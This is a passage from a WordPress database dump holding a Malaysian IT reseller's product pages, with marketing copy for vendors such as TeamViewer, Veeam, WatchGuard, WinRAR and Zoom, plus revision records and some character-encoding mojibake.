07:47:20','','Ruckus','','inherit','closed','closed','','1578-revision-v1','','','2018-12-11 15:47:20','2018-12-11 07:47:20','',1578,'https://bintara.com.my/blog/2018/12/11/1578-revision-v1/',0,'revision','',0),(1594,1,'2018-12-11 15:47:35','2018-12-11 07:47:35','','Sage','','inherit','closed','closed','','1579-revision-v1','','','2018-12-11 15:47:35','2018-12-11 07:47:35','',1579,'https://bintara.com.my/blog/2018/12/11/1579-revision-v1/',0,'revision','',0),(1595,1,'2018-12-11 15:47:48','2018-12-11 07:47:48','','Samsung','','inherit','closed','closed','','1580-revision-v1','','','2018-12-11 15:47:48','2018-12-11 07:47:48','',1580,'https://bintara.com.my/blog/2018/12/11/1580-revision-v1/',0,'revision','',0),(1601,1,'2018-12-11 15:50:20','2018-12-11 07:50:20','','Solarwinds','','inherit','closed','closed','','1597-revision-v1','','','2018-12-11 15:50:20','2018-12-11 07:50:20','',1597,'https://bintara.com.my/blog/2018/12/11/1597-revision-v1/',0,'revision','',0),(1602,1,'2018-12-11 15:50:34','2018-12-11 07:50:34','','Sophos','','inherit','closed','closed','','1598-revision-v1','','','2018-12-11 15:50:34','2018-12-11 07:50:34','',1598,'https://bintara.com.my/blog/2018/12/11/1598-revision-v1/',0,'revision','',0),(1603,1,'2018-12-11 15:51:07','2018-12-11 07:51:07','','adobe','','inherit','closed','closed','','adobe-2','','','2018-12-11 15:51:07','2018-12-11 07:51:07','',1436,'https://bintara.com.my/wp-content/uploads/2018/12/adobe.png',0,'attachment','image/png',0),(1604,1,'2018-12-11 15:51:20','2018-12-11 07:51:20','','Synology','','inherit','closed','closed','','1600-revision-v1','','','2018-12-11 15:51:20','2018-12-11 07:51:20','',1600,'https://bintara.com.my/blog/2018/12/11/1600-revision-v1/',0,'revision','',0),(1605,1,'2018-12-11 15:57:24','2018-12-11 07:57:24','<strong>TeamViewer</strong>Â focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password Reset</li>\r\n</ul>\r\n<div class=\"vc_row wpb_row vc_row-fluid wd-row wd-row--tertiary\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-md-8 vc_col-xs-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\">\r\n<h3>Connect to Your Desktop Remotely. Without Slow VPN or Network Security Restrictions Getting in Your Way.</h3>\r\n</div>\r\nSupported by a blazing-fast global network, TeamViewerâ„¢ free remote access softwareÂ tools enable you connect to your work computer, from anywhere, anytime. So you can continue working with desktop applications remotely. And access desktop files, as if you were sitting in front of your workstation. Quickly. Easily. Securely.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"overview\" class=\"vc_row wpb_row vc_row-fluid wd-row\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div id=\"overview\" class=\"wpb_column vc_column_container vc_col-sm-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','TeamViewer','','publish','closed','closed','','teamviewer','','','2018-12-14 10:21:06','2018-12-14 02:21:06','',0,'https://bintara.com.my/?page_id=1605',0,'page','',0),(1606,1,'2018-12-11 15:52:20','2018-12-11 07:52:20','Technology platforms for Internet Access, Enterprise, and SmartHome applications.\r\n\r\nAll Ubiquiti product we provide :\r\n<ul>\r\n 	<li>ROUTING &amp; SWITCHING</li>\r\n 	<li class=\"comProductList__item__description\">WHOLE HOME WI-FI</li>\r\n 	<li>WIRELESS</li>\r\n 	<li>VOIP</li>\r\n 	<li>LEGACY</li>\r\n 	<li>CAMERAS</li>\r\n 	<li>OLT</li>\r\n 	<li>AP</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Ubiquiti','','publish','closed','closed','','ubiquiti','','','2018-12-14 10:47:56','2018-12-14 02:47:56','',0,'https://bintara.com.my/?page_id=1606',0,'page','',0),(1607,1,'2018-12-11 15:52:20','2018-12-11 07:52:20','','Ubiquiti','','inherit','closed','closed','','1606-revision-v1','','','2018-12-11 15:52:20','2018-12-11 07:52:20','',1606,'https://bintara.com.my/blog/2018/12/11/1606-revision-v1/',0,'revision','',0),(1608,1,'2018-12-11 15:52:40','2018-12-11 07:52:40','<h3>Veeam</h3>\r\n<h3><span class=\"veeam-text__text-largest\">Expanding leadership inÂ CloudÂ Data Management</span></h3>\r\n<div class=\"section-title-component aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--phone--0 aem-GridColumn--tablet--6 aem-GridColumn--offset--default--0\">\r\n<div class=\"section-title section-title--alignment-left section-title--only-title veeam-component__component-spacing-below--md\">\r\n<div class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>\r\n[maxbutton id=\"1\" ]','Veeam','','publish','closed','closed','','veeam','','','2018-12-14 10:51:03','2018-12-14 02:51:03','',0,'https://bintara.com.my/?page_id=1608',0,'page','',0),(1609,1,'2018-12-11 15:53:22','2018-12-11 07:53:22','<h3>The new NetBackup. The best just got better.</h3>\r\n<h3>Business Continuity</h3>\r\nDefy disasters and outages. Keep your business running.\r\n<h4>Disaster recovery planning guide</h4>\r\n<strong>Plan for what your business needs tomorrow.</strong>\r\nThe best business continuity plans are determined based on present and future business needs, not just static IT requirements. Make sure to build your plan from a business perspective.\r\n\r\n&nbsp;\r\n<h3>We solve your most important data protection problems.</h3>\r\n<h4>Ransomware</h4>\r\nProtect your business from malware that encrypts, or locks, valuable digital files and demands a ransom to release them.\r\n<h4>Modern Workloads</h4>\r\nSupport for Nutanix, Hadoop, VMware. NetBackup can do that.\r\n<h4>Software-Defined Storage</h4>\r\nSDS offers greater flexibility and choice, better economics and enterprise-class service levels.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Veritas','','publish','closed','closed','','veritas','','','2018-12-14 14:39:41','2018-12-14 06:39:41','',0,'https://bintara.com.my/?page_id=1609',0,'page','',0),(1610,1,'2018-12-11 15:53:45','2018-12-11 07:53:45','<h2>Wacom Business Solutions</h2>\r\n<h3 id=\"SubHeader\" class=\"subheader\">Provider of electronic signature pads, pen displays and mobile signature solutions.</h3>\r\nWhether you are interested in enhancing your digital workflow or improving the effectiveness of your visual communications, Wacom Business Solutions is here to help you. Our devices are reliable, durable, and easy to use. We can help you find the right partner for software and integration services. And if you want to develop your own software, we can help you with software development kits as well.\r\n\r\n&nbsp;\r\n<h3 id=\"Header\">Markets where Wacom pen input is changing lives</h3>\r\nFrom capturing electronic signatures to drawing directly on the screen, Wacom has a pen solution for you.\r\n\r\nIf saving time, reducing costs, and improving customer service is important to you, then you may be interested to learn how Wacom helps companies and institutions achieve these results.\r\n<h3 id=\"Header\">Hardware</h3>\r\n<p id=\"SubHeader\" class=\"subheader\">Wacom\'s full line of signature pads, pen displays, and mobile signature solutions are designed for your electronic document workflow needs.</p>\r\n&nbsp;\r\n\r\nWacom products are for organizations looking to capture handwritten electronic signatures, implement electronic forms, or to communicate visually in a natural way. Our signature pads and interactive pen display products feature Wacomâ€™s patented pressure-sensitive, battery-free and cordless pen technology. All Wacom products are reliable and dependable. They all feature protective cover glass that is scratch resistant for long life and durable operation. Our electronic pens, for the counter or desktop, never need batteries or a cord to carry an electronic signal. Since no electronic signals are passed through the pen tether, pen operation cannot be affected by damage to the tether. And all Wacom pen input devices provide outstanding accuracy and control which makes your digital experience feel like real world.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Wacom','','publish','closed','closed','','wacom','','','2018-12-13 23:28:17','2018-12-13 15:28:17','',0,'https://bintara.com.my/?page_id=1610',0,'page','',0),(1612,1,'2018-12-11 15:54:12','2018-12-11 07:54:12','<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h3>Solutions That Evolve as Industry Needs Change</h3>\r\n<h4>Education</h4>\r\n<p class=\"extra-pad\">Educational institutions strive to create high quality learning environments with easy access to wired and wireless online research and communication tools â€“ but with this access, organization must deploy the necessary measures to keep students safe from hostile threats and inappropriate content.</p>\r\n\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \">\r\n<h4>Finance</h4>\r\n<p class=\"extra-pad\">While many financial services organizations today are eager to leverage FinTech (Financial Technology) to delight customers with new banking options, keeping pace with industry innovation does not come without reputational, regulatory, and operational considerations that effective security programs cannot ignore.</p>\r\n\r\n<h4>Healthcare</h4>\r\n<p class=\"extra-pad\">The potential of emerging technology within the healthcare sector is boundless, transforming care delivery, patient satisfaction, and the very industry itself. But for all the promise, healthcare facilities cannot lose sight of the continuing effort to secure network resources and ensure privacy.</p>\r\n\r\n<h4>Retail &amp; Hospitality</h4>\r\n<p class=\"extra-pad\">When a retail or hospitality business suffers a data breach, costs can quickly escalate, business opportunities can be squandered, and customer loyalties can sour. Whether the cyber attack is delivered over Wi-Fi, at a POS station, or through phishing emails to internal users, the result can devastate a business.</p>\r\n\r\n<h4>State and Local Government</h4>\r\n<p class=\"extra-pad\">State and local government agencies collect and store a great deal of sensitive information about citizens, often more than even the federal government. But because they also have a fundamental duty to protect not just their data, but more critically their people, the matter of cyber security becomes much more than an IT issue â€“ it becomes an issue of public safety.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"row\">\r\n<div class=\"col-xs-12 col-sm-6 col-md-6 col-lg-6 \"></div>\r\n</div>\r\n<h3 class=\"page_title\">Network Security</h3>\r\n<h4>One Platform, Total Security</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique approach to network security focuses on bringing best-in-class, enterprise-grade security to any organization, regardless of size or technical expertise. Ideal for SMBs and distributed enterprise organizations, our award-winning Unified Threat Management (UTM) appliances are designed from the ground up to focus on ease of deployment, use, and ongoing management, in addition to providing the strongest security possible.\r\n<h3 class=\"page_title\">Multi-Factor Authentication</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Keep</strong> Criminals<strong> Outside Your Network with AuthPoint</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nOur unique multi-factor authentication (MFA) solution not only helps to reduce the likelihood of network disruptions and data breaches arising from lost or stolen credentials, but we deliver this important capability entirely from the Cloud for easy set-up and management. AuthPoint goes beyond traditional 2-Factor Authentication (2FA) by considering innovative ways to positively identify users, and our large ecosystem of 3rd party integrations means that you can use MFA to protect access to the network, VPNs, and Cloud applications. Even non-technical users find the AuthPoint mobile app easy and convenient to use!\r\n\r\nUltimately, WatchGuard AuthPoint is the right solution at the right time to make MFA a reality for the businesses who desperately need it to block attacks.\r\n\r\n</div>\r\n<h3 class=\"page_title\">Secure Wi-Fi</h3>\r\n<div class=\"prod-headline\">\r\n<div class=\"field field-name-field-prod-headline field-type-text field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n<h4><strong>Your Trusted Wireless Environment Starts with Secure, Cloud-Managed Wi-Fi</strong></h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"prod-intro-center\">\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nA Trusted Wireless Environment is a framework for building a complete Wi-Fi network that isÂ <strong>fast, easy to manage</strong>, and most importantly,Â <strong>secure</strong>. Businesses face the responsibility to build Trusted Wireless Environments protecting their employees and customers from hackers who easily exploit the weak or non-existent security of traditional Wi-Fi networks. With security and performance at the heart of our products, WatchGuard is the only company to provide the technology and solutions that you can use to build a Trusted Wireless Environment â€“ delivering on each of the three core pillars ofÂ <strong>market-leading performance, scalable management, and verified comprehensive security.</strong>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Watchguard','','publish','closed','closed','','watchguard','','','2018-12-14 14:36:50','2018-12-14 06:36:50','',0,'https://bintara.com.my/?page_id=1612',0,'page','',0),(1613,1,'2018-12-11 15:52:40','2018-12-11 07:52:40','','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-11 15:52:40','2018-12-11 07:52:40','',1608,'https://bintara.com.my/blog/2018/12/11/1608-revision-v1/',0,'revision','',0),(1614,1,'2018-12-11 15:53:22','2018-12-11 07:53:22','','Veritas','','inherit','closed','closed','','1609-revision-v1','','','2018-12-11 15:53:22','2018-12-11 07:53:22','',1609,'https://bintara.com.my/blog/2018/12/11/1609-revision-v1/',0,'revision','',0),(1615,1,'2018-12-11 15:53:45','2018-12-11 07:53:45','','Wacom','','inherit','closed','closed','','1610-revision-v1','','','2018-12-11 15:53:45','2018-12-11 07:53:45','',1610,'https://bintara.com.my/blog/2018/12/11/1610-revision-v1/',0,'revision','',0),(1616,1,'2018-12-11 15:54:12','2018-12-11 07:54:12','','Watchguard','','inherit','closed','closed','','1612-revision-v1','','','2018-12-11 15:54:12','2018-12-11 07:54:12','',1612,'https://bintara.com.my/blog/2018/12/11/1612-revision-v1/',0,'revision','',0),(1617,1,'2018-12-11 15:54:41','2018-12-11 07:54:41','<h3>Data Readiness Can Lead to Business Transformation</h3>\r\n<h4></h4>\r\n<h4><span style=\"text-decoration: underline;\">Data Center</span></h4>\r\n<h4>Storage Systems</h4>\r\nUnleash the power of your data. With our comprehensive line up of storage systems - from all-flash, to hybrid to object storage - you can transform data into actionable information faster and achieve new levels of efficiency and costs.\r\n<h4>Storage Platforms</h4>\r\nBig Data. Fast Data. The digital universe continues to expand exponentially and so does its potential. We have a complete portfolio of storage platforms and servers designed to thrive under the most demanding performance and capacity needs.\r\n<h4>Data Center Drives</h4>\r\nAccelerate applications, analytics and data access with Western Digitalâ€™s broad portfolio of Ultrastar HDDs, SSDs and memory extension drives. The capacity and performance to help your data thrive.\r\n\r\n&nbsp;\r\n<h4><span style=\"text-decoration: underline;\">Mobility, Edge &amp; Computing</span></h4>\r\n<h4>Internal Drives</h4>\r\nOur internal drives are purpose-built to enable your data to thrive. We provide the speed, capacity, and performance, so you can drive innovation and satisfy new demands.\r\n<h4>Embedded &amp; Removable Flash</h4>\r\nData is everywhere multiplying at an astonishing rate. The complexity of data is driving innovation as businesses seek to extract more value and achieve new breakthroughs by harnessing the power of data.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Western Digital','','publish','closed','closed','','western-digital','','','2018-12-14 12:22:16','2018-12-14 04:22:16','',0,'https://bintara.com.my/?page_id=1617',0,'page','',0),(1618,1,'2018-12-11 15:55:19','2018-12-11 07:55:19','<strong>WinRAR</strong> is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.\r\n\r\nWinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface. WinRAR is easier to use than many other archivers with the inclusion of a special \"Wizard\" mode which allows instant access to the basic archiving functions through a simple question and answer procedure.\r\n\r\nWinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits. It supports files and archives up to 8,589 billion gigabytes in size. It also offers the ability to create selfextracting and multivolume archives. With recovery record and recovery volumes, you can reconstruct even physically damaged archives.\r\n\r\n&nbsp;\r\n<p class=\"tplain\"><b>MULTI-USER LICENSES</b></p>\r\n<p class=\"tplain\">The user purchases a number of usage licenses for use, by the purchaser or the purchaser\'s employees on the same number of computers. In a network (server/client) environment you must purchase a license copy for each separate client (workstation) on which RAR is installed, used, or accessed.</p>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','WinRAR','','publish','closed','closed','','winrar','','','2018-12-14 11:44:11','2018-12-14 03:44:11','',0,'https://bintara.com.my/?page_id=1618',0,'page','',0),(1619,1,'2018-12-11 15:55:27','2018-12-11 07:55:27','<h2>ENHANCE PERFORMANCE WITH ENTERPRISE SCANNERS, MOBILE COMPUTERS, TABLETS AND PRINTERS</h2>\r\nMore is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.\r\n<ul>\r\n 	<li><strong>MOBILE COMPUTERS AND TABLETS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1801\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mobile-computer-and-tablet.jpg\" alt=\"\" width=\"346\" height=\"195\" />\r\n\r\nEach mobile computer comes with airtight security, steadfast durability and intelligent voice and data performance. With the Android operating system, youâ€™ll find theyâ€™re just as easy to use as your personal devices. This isn\'t consumer technology retrofit for business. Instead, these mobile computers are designed specifically for your enterprise and environment.\r\n<ul>\r\n 	<li><strong>BARCODE SCANNERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1800\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/barcode-scanner.jpg\" alt=\"\" width=\"333\" height=\"187\" />\r\n\r\nFast. Accurate. Durable. Whether you need to capture data at a point of sale, patientâ€™s bedside, production line or warehouse, we have a scanner made for your environment and application.\r\n<ul>\r\n 	<li><strong>PRINTERS</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-1802\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer.jpg\" alt=\"\" width=\"326\" height=\"183\" />\r\n\r\nNo matter what youâ€™re tracking or tagging, with barcodes or RFID, Zebra has the most advanced solutions. This legacy of innovation continues with best-of-breed desktop, industrial, card and mobile printers. And theyâ€™re embedded with software for remote management, easy integration and peak performance.\r\n\r\n[maxbutton id=\"1\" ]','Zebra','','publish','closed','closed','','zebra','','','2018-12-13 23:16:57','2018-12-13 15:16:57','',0,'https://bintara.com.my/?page_id=1619',0,'page','',0),(1620,1,'2018-12-11 15:55:45','2018-12-11 07:55:45','<h2>Zoom for the Conference Room</h2>\r\n<h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3>\r\nhttps://youtu.be/yRQGXlJS-xI\r\n<h3>Simple, flexible set up</h3>\r\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\r\n<h3>Modern capabilities</h3>\r\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\r\n<h3>Happy, productive users</h3>\r\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\r\n<h4>HD video and audio</h4>\r\nBring high quality video, audio, and web conferencing to your existing rooms.\r\n<h4>Wireless sharing</h4>\r\nCut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.\r\n<h4>Interoperability with any video system</h4>\r\nCommunicate with existing SIP or H.323 systems\r\n<h4>Meet with anyone</h4>\r\nInclude remote participants on desktop, mobile, or other conference room systems.\r\n<h4>One touch to start meetings</h4>\r\nLeveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.\r\n<h4>Centralized management</h4>\r\nGet the overview status and management of deployed conference rooms in a single admin console\r\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\r\n<h3>Digital Signage</h3>\r\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\r\n<ul>\r\n 	<li>Leverage room displays when not in use</li>\r\n 	<li>Manage displays at scale or individually</li>\r\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\r\n</ul>\r\n<h3>Scheduling Display</h3>\r\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\r\n<h3>Make interactive collaboration easy with touch screens</h3>\r\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.\r\n\r\nhttps://youtu.be/gezS90Pg_fk\r\n\r\n[maxbutton id=\"1\" ]','Zoom','','publish','closed','closed','','zoom','','','2019-03-21 10:58:44','2019-03-21 02:58:44','',0,'https://bintara.com.my/?page_id=1620',0,'page','',0),(1623,1,'2018-12-11 15:54:41','2018-12-11 07:54:41','','Western Digital','','inherit','closed','closed','','1617-revision-v1','','','2018-12-11 15:54:41','2018-12-11 07:54:41','',1617,'https://bintara.com.my/blog/2018/12/11/1617-revision-v1/',0,'revision','',0),(1624,1,'2018-12-11 15:55:19','2018-12-11 07:55:19','','WinRAR','','inherit','closed','closed','','1618-revision-v1','','','2018-12-11 15:55:19','2018-12-11 07:55:19','',1618,'https://bintara.com.my/blog/2018/12/11/1618-revision-v1/',0,'revision','',0),(1625,1,'2018-12-11 15:55:27','2018-12-11 07:55:27','','Zebra','','inherit','closed','closed','','1619-revision-v1','','','2018-12-11 15:55:27','2018-12-11 07:55:27','',1619,'https://bintara.com.my/blog/2018/12/11/1619-revision-v1/',0,'revision','',0),(1644,1,'2018-12-11 16:24:51','2018-12-11 08:24:51','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:24:51','2018-12-11 08:24:51','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1626,1,'2018-12-11 15:55:45','2018-12-11 07:55:45','','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2018-12-11 15:55:45','2018-12-11 07:55:45','',1620,'https://bintara.com.my/blog/2018/12/11/1620-revision-v1/',0,'revision','',0),(1643,1,'2018-12-11 16:21:44','2018-12-11 08:21:44','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current 